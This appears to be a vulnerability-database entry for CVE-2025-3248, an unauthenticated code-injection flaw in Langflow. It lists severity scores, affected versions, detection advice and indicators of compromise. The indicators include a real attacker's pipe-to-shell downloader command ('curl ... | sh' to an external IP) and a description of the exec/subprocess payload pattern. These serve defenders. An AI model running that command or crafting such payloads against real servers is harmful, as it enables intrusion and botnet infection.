cbcvebase.
CVE-2025-3248
published 2025-04-07

CVE-2025-3248: Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-05-26
Exploited in the wild
EPSS
99.97%
100.0th percentile
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.

Affected

5 ranges
VendorProductVersion rangeFixed in
langflow-ailangflow< 1.9.01.9.0
langflowlangflow< 1.8.21.8.2
langflowlangflow< 1.3.01.3.0
langflowlangflow>= 0 < 1.3.01.3.0
langflowlangflow0 – 1.8.2

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://github.com/verylazytech/CVE-2025-3248
ip80.66.75.121
port25565
filenamedocker
commandcurl -s http://80.66.75.121:25565/docker | sh
ip173.212.205.251
  • Monitor for unauthenticated POST requests to the /api/v1/validate/code endpoint; any request reaching this endpoint without a valid JWT Bearer token or x-api-key should be treated as suspicious.
  • Detect payloads containing exec() with __import__("subprocess") patterns in POST bodies to /api/v1/validate/code, particularly those embedding system commands inside raise Exception() wrappers.
  • Monitor for outbound curl/wget requests from the Langflow server process to external IPs, especially pipe-to-shell patterns (curl ... | sh), which indicate post-exploitation downloader activity.
  • Hunt for reconnaissance commands (whoami, printenv, ip addr show, ifconfig, capsh --print, systemctl status sshd, cat /root/.bash_history) spawned as child processes of the Langflow application process.
  • Detect exfiltration of .env and .db files from Langflow servers; monitor for reads of environment variable files and database files shortly after inbound POST requests to the validate/code endpoint.
  • Flag Langflow server processes spawning network connections over TCP to unusual external IPs/ports, consistent with Flodrix botnet C2 communication for DDoS command receipt.
  • ·The vulnerability is distinct from CVE-2026-33017, which targets the /api/v1/build_public_tmp/{flow_id}/flow endpoint; both share the same exec()-without-sandboxing root cause but affect different endpoints.
  • ·The Flodrix botnet payload self-terminates and deletes itself if executed without a valid argument, meaning initial infection attempts may not leave persistent artifacts — defenders should focus on network-level and process-spawn indicators rather than file persistence alone.
  • ·CISA added CVE-2025-3248 to its Known Exploited Vulnerabilities catalog on May 5, 2025, confirming active in-the-wild exploitation; treat any unpatched Langflow instance as actively targeted.
  • ·Ongoing exploitation of CVE-2025-3248 has been linked to the Iranian threat group MuddyWater, indicating nation-state interest in this vulnerability beyond opportunistic botnet operators.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.